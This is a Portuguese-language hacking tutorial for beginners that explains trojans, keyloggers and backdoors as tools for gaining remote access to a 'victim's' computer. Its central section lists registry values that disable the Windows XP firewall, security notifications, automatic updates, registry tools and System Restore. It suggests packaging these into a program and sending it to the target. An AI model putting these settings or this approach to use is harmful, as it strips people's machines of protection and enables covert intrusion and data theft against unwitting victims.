Tutorial para quem quér ser um Hacker!
Como hackear alguém??
- Esta é a pergunta que todos os novos fazem.
Bom, hackear não é uma receita de bolo “faça isso, aquilo, aquilo e pronto, vc hackeou”, existem diversas técnicas a serem utilizadas. Qual técnica utilizar é algo que depende do estilo do hacker e da vitima em questão – ou seja deve-se analisar as vulnerabilidades da vitima para escolher a melhor técnica.
Uma técnica muito utilizada pelas pessoas é o envio de Trojans.
O Trojan (ou Cavalo de Tróia):
Bom, denomina-se trojan qualquer programa que venha embutido dentro de outro sem que a pessoa que recebeu saiba. O trojan geralmente modifica o registro do windows para que seja iniciado junto com o mesmo.
O termo Cavalo de Tróia faz referência àquela história (se é lenda ou nao perguntem para algum historiador) em que houve uma Guerra entre Gregos e Troianos. Pelo fato de Tróia ser uma cidade totalmente fechada por muros altos, era impossivel o avanço dos gregos. Até que, os gregos tiveram a idéia de enviar um presente, um cavalo de madeira, como um suposto acordo de paz… Mal sabiam os troianos que dentro deste cavalo ocultava-se todo o exército grego… ao entrarem na cidade de Tróia, os gregos que ali escondiam-se resolveram atacar a noite quando os troianos estivessem bêbados (comemorando o fim da guerra). E assim os gregos sairam do cavalo a noite e mataram os troianos…
Também existe a expressão “presente de grego”, do tipo “Cuidado, isso ae deve ser presente de grego hein…”
Existem vários tipos de Trojans, vamos ver alguns:
- Keylogger: Este é um trojan que grava todas as teclas pressionadas pela vitima em um log. Pode servir tanto para monitorar outras pessoas como para monitorar o próprio computador. O log geralmente é enviado por e-mail, que é colocado na configuração do KL (abreviação de keylogger).
- Backdoor: Esté é quente . Este trojan abre uma porta dos fundos no PC da vitima quando instalado (por isso o nome backdoor) e permite o acesso remoto. Isso significa que você tem total acesso ao PC da vítima. Este trojan funciona no sistema cliente/servidor. O servidor é enviado para a vitima enquanto o cliente fica com vc (vc usa ele para se conectar ao servidor e consequentemente ao pc da vitima, ja que o server está la).
- Vírus: Um trojan que pode ou não provocar danos ao PC da vitima. Vírus que só exibem mensagens para assustar a vítima são chamados de “vírus benignos” enquanto que vírus que provocam estragos são chamados de “vírus malignos”.
Eu tenho um AV (Anti-virus). Estou protegido??
- Depende. Contra um script kiddie (pessoa que pega hacks prontos na internet) vc pode sim estar protegido (a menos que seja um hack novo), mas se for um hacker de verdade (que programa seus próprios hacks) essa proteção não existe, pois o AV funciona mais ou menos desse jeito:
Hacker desenvolve um poderoso Trojan e o joga na net. Várias pessoas começam a sofrer com ele (ou usar ele). Então, o AV simplesmente lança uma vacina, que bloqueia o código daquele Trojan. O problema disso tudo é que qualquer modificação que seja feita no código original (as chamadas variantes) o AV não vai mais detectar . Por isso um hacker de verdade nao tem seus hacks detectados pelo AV pq é ele mesmo quem desenvolve, e nenhum AV no mundo desenvolveria uma vacina para um hack que somente uma pessoa no mundo usa ^^.
Eu não uso firewall e estou protegido pq tenho AV atualizado!!
-Não diga isso!!! Acabei de dizer que um hack desenvolvido apenas para uso próprio por um hacker jamais será detectado (a menos que ele seja jogado na net). Se uma pessoa enviar uma backdoor “caseira” pra vc, e vc nao tiver firewall, pronto! seu PC está invadido!!!
Mas eu tenho o firewall do windows!!
- Firewall do Windows é muito fácil de desabilitar, é só fazer umas mudanças no registro e Voilá!!! Agora quais dados do registro devo eu editar??
Código!
[HKLMSYSTEMCurrentControlSetServicesSharedAccessParametersFirewallPolicyDomainProfile]
DisableNotifications = 1 DWORD
EnableFirewall = 0 DWORD
DoNotAllowExceptions = 0 DWORD
[HKLMSYSTEMCurrentControlSetServicesSharedAccessParametersFirewallPolicyStandardProfile]
DisableNotifications = 1 DWORD
EnableFirewall = 0 DWORD
DoNotAllowExceptions = 0 DWORD
[HKLMSoftwareMicrosoftSecurity Center]
AntiVirusDisableNotify = 1 DWORD
FirewallDisableNotify = 1 DWORD
UpdatesDisableNotify = 1 DWORD
AntiVirusOverride = 1 DWORD
FirewallOverride = 1 DWORD
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceswscsvc]
Start=dword:00000004
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceswuauserv]
Start=dword:00000004
[HKEY_CURRENT_USERSoftwarePoliciesMicrosoftWindowsWindowsUpdateAU]
NoAutoUpdate=dword:00000001
AUOptions=dword:00000001
[HKCUSoftwareMicrosoftWindowsCurrentVersionGroup Policy ObjectsLocalUserSoftwareMicrosoftWindowsCurrentVersionPoliciesWindowsUpdate]
DisableWindowsUpdateAccess=dword:00000001
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionWindowsUpdateAuto Update]
AUState=dword:00000007
AUOptions=dword:00000001
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableRegistryTools]
[HKLMSOFTWAREMicrosoftWindows NTCurrentVersionSystemRestoreDisableSR]
Essas não apenas vão desativar o firewall como também vão desativar todo o esquema de segurança do windows XP (dae fica a gosto do freguês).
Como criar um programa que edite esses dados e enviar para a pessoa?? Bom dae vc precisa aprender uma linguagem de programação . Pq um hacker que não sabe programar não merece ser chamado de hacker .
Firewall é muito importante sim!!! Se vc tiver conexão dial-up entao nem se fala!!! (o modem ADSL fecha as portas em 99% dos casos, mas mesmo assim vc teria que ter firewall pra monitorar as portas abertas que vc tem). Agora imagina uma pessoa que usa dial-up e nao tem firewall!!! É pedir pra ser hackeado!!!
:: Exploit: Exploit é um programa que explora determinada vulnerabilidade. Muito usado para invadir servidores da internet. Se quiser saber mais um pouco sobre isso: https://www.invasao.com.br/forum/viewtop … +injection
:: CMD: É um script (geralmente PHP) usado para fazer um ataque de PHP Injection. Se tiverem dúvidas tem um ótimo tutorial ae falando sobre o PHP Injection: https://www.invasao.com.br/forum/viewtop … +injection
Foi feito pelo thorking o tutorial.
:: Como eu desenvolvo meus programas?
- Estude programação. Para programas que utilizam formulários para inserção de dados uma boa pedida é o Delphi.
